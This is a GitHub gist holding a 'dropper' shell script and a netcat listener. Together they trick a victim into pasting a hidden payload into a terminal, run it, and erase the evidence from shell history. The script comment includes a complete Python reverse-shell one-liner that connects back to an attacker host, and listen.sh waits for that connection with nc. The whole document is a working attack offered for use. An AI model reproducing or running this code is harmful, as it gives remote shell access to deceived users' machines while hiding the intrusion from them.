Skip to content

Instantly share code, notes, and snippets.

@dlanner

dlanner/dropper.sh

Last active January 27, 2017 17:33
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save dlanner/877117aecd481fc9e84ece48108b6c82 to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save dlanner/877117aecd481fc9e84ece48108b6c82 to your computer and use it in GitHub Desktop.
Download ZIP
Fairly stealthily trick a victim into copying/pasting a payload onto their own system and then hide your tracks. Based on hidden CSS trick from https://lifepluslinux.blogspot.com/2017/01/look-before-you-paste-from-website-to.html
Raw
dropper.sh
# Hide this code in HTML that will be copied/pasted using hidden CSS trick from https://lifepluslinux.blogspot.com/2017/01/look-before-you-paste-from-website-to.html
# It will execute the payload, and then erase its own lines from both the terminal screen and history (with the current exception of the first line, which will successfully be removed from history, but remain on the screen; still researching how to solve this.)
# $PAYLOAD can be a reverse shell like from here http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
# Example:
# python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("$YOUR_HOST",$YOUR_PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
stty -echo
(eval "$PAYLOAD" & ) && echo -e "\r"
history -w && LINE_NUM=$(history | tail -1 | awk -F ' ' '{print $1}' | xargs) && history -d $((LINE_NUM - 1)) && history -d $((LINE_NUM - 1)) && history -d $((LINE_NUM - 2)) && echo -e "\r" && stty echo && echo -e "\r"
Raw
listen.sh
# On your host
nc -l $YOUR_PORT -vvv
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment